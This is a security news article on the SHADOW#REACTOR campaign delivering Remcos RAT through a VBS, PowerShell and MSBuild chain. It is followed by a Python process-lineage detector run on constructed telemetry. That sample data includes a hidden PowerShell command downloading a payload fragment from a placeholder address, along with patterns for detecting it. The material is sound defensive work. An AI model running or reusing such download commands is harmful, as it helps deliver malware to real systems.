Security researchers have uncovered a sophisticated new malware framework that is slipping past enterprise defenses by hiding in plain sight. Dubbed SHADOW#REACTOR by the Securonix Threat Research team, this campaign employs a “tightly orchestrated” multi-stage attack to deploy the notorious Remcos RAT, all while leaving virtually no footprint on the victim’s hard drive.
The campaign marks a significant evolution in how cybercriminals are delivering commodity malware, moving away from traditional executable files to a complex assembly line of scripts and text fragments that are stitched together only in the system’s memory.
At the heart of SHADOW#REACTOR is a novel evasion technique: the use of “text-only intermediates.” Instead of downloading a malicious binary that antivirus software might flag, the malware retrieves harmless-looking text files—such as qpwoe32.txt or config.txt—which contain fragmented pieces of the payload.
“The infection chain follows a tightly orchestrated execution path: an obfuscated VBS launcher executed via wscript.exe invokes a PowerShell downloader, which retrieves fragmented, text-based payloads from a remote host”.
These fragments are useless on their own. However, once downloaded, the malware reconstructs them into encoded loaders. These are then “decoded in memory by a .NET Reactor-protected assembly, and used to fetch and apply a remote Remcos configuration”. This “fileless” approach ensures that the malicious code never touches the disk in a recognizable form, complicating forensic analysis and bypassing static detection engines.
The attackers are also abusing legitimate Windows tools to carry out their dirty work, a tactic known as “Living-off-the-Land” (LotL).
The analysis highlights that “the final stage leverages MSBuild.exe as a living-off-the-land binary (LOLBin) to complete execution, after which the Remcos RAT backdoor is fully deployed and takes control of the compromised system”.

By using trusted Microsoft binaries like wscript.exe and MSBuild.exe, the malware blends in with normal administrative activity, making it difficult for security teams to distinguish between a system update and a hostile takeover.
Despite the sophistication of the delivery mechanism, the targeting appears indiscriminate. The campaign avoids sector-specific lures in favor of a “spray-and-pray” approach.
“The absence of tailored decoys or sector-specific themes indicates a spray-and-pray approach aimed at scale rather than high-value targets”.
This broad targeting strategy suggests the operators are likely initial access brokers—criminals who breach networks not to steal data themselves, but to sell the “foothold” to ransomware gangs or other threat actors.
“From an attribution standpoint, the tooling and tradecraft are consistent with financially motivated operators, including potential initial access brokers”.
While the payload is the well-known, commercially available Remcos RAT, the architects behind SHADOW#REACTOR remain in the shadows.
“At present, there is insufficient evidence to attribute this activity to a known threat group or nation-state actor”.
The Securonix team concludes that “SHADOW#REACTOR is therefore best assessed as an unattributed, financially motivated loader framework designed to deliver Remcos RAT at scale while evading detection through in-memory execution and LOLBin abuse”.
Organizations are advised to monitor for unusual script execution and restrict the use of administrative tools like PowerShell and MSBuild to prevent this invisible assembly line from running on their networks.
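As an added illustration of the monitoring the article recommends (example code written for this page, not from the Securonix report or the campaign's own tooling), the script below reconstructs process lineage from Sysmon-style process-creation records and flags the three links in the chain described above: a script host (wscript.exe) spawning PowerShell, PowerShell fetching a remote .txt fragment, and MSBuild.exe running underneath a script-host or PowerShell ancestor rather than a developer tool. The telemetry, the 203.0.113.5 address, the VBS and .proj paths and the rule names are all constructed; only the fragment name qpwoe32.txt comes from the article.

```python
"""Process-lineage detection for a wscript -> PowerShell -> MSBuild chain.

Added example for this page, not part of the Securonix analysis. The events
below are CONSTRUCTED Sysmon-like process-creation records (pid, ppid, image,
command line), not real telemetry from the campaign.
"""
import json
import re

# Constructed sample telemetry, one JSON object per line.
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"}
{"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\wscript.exe", "cmd": "wscript.exe C:\\Users\\u\\Downloads\\invoice.vbs"}
{"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -w hidden -ep bypass -c iwr http://203.0.113.5/qpwoe32.txt -o $env:TEMP\\q.txt"}
{"pid": 400, "ppid": 300, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", "cmd": "MSBuild.exe C:\\Users\\u\\AppData\\Local\\Temp\\p.proj"}
{"pid": 500, "ppid": 100, "image": "C:\\Program Files\\Microsoft Visual Studio\\devenv.exe", "cmd": "devenv.exe"}
{"pid": 600, "ppid": 500, "image": "C:\\Program Files\\Microsoft Visual Studio\\MSBuild\\Current\\Bin\\MSBuild.exe", "cmd": "MSBuild.exe proj.csproj /t:Build"}
{"pid": 700, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe Get-Process"}
"""

# Windows script hosts that should rarely be launching PowerShell in an enterprise.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# A PowerShell command line pulling a .txt resource from a remote host.
REMOTE_TXT = re.compile(r"https?://\S+\.txt\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def ancestry(by_pid, pid, max_depth=16):
    """Return [image of pid, its parent, grandparent, ...] as basenames.

    Stops at an unknown ppid, a cycle (pid reuse), or max_depth.
    """
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        event = by_pid[pid]
        chain.append(basename(event["image"]))
        pid = event["ppid"]
    return chain


def detect(events):
    """Return (pid, rule, lineage) tuples for events matching the chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        name = basename(event["image"])
        chain = ancestry(by_pid, event["pid"])
        parents = chain[1:]
        lineage = " <- ".join(chain)
        # Link 1: obfuscated VBS launcher (wscript.exe) invoking PowerShell.
        if name == "powershell.exe" and parents and parents[0] in SCRIPT_HOSTS:
            alerts.append((event["pid"], "script_host_spawns_powershell", lineage))
        # Link 2: PowerShell downloader retrieving text-only intermediates.
        if name == "powershell.exe" and REMOTE_TXT.search(event["cmd"]):
            alerts.append((event["pid"], "powershell_fetches_remote_txt", lineage))
        # Link 3: MSBuild.exe as a LOLBin under script/PowerShell ancestry,
        # as opposed to a build launched from a developer tool such as devenv.
        if name == "msbuild.exe" and any(p in SCRIPT_HOSTS | {"powershell.exe"} for p in parents):
            alerts.append((event["pid"], "msbuild_under_script_lineage", lineage))
    return alerts


if __name__ == "__main__":
    for pid, rule, lineage in detect(parse_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {rule}: {lineage}")
```

Walking the full ancestry, rather than checking only the immediate parent, is what separates the MSBuild launched by the chain (pid 400) from the MSBuild launched by Visual Studio (pid 600); the plain interactive PowerShell (pid 700) produces no alert. In production the same lineage check would be fed from the EDR or Sysmon stream, and the MSBuild rule would be paired with an allow-list of the build hosts where developer activity is expected.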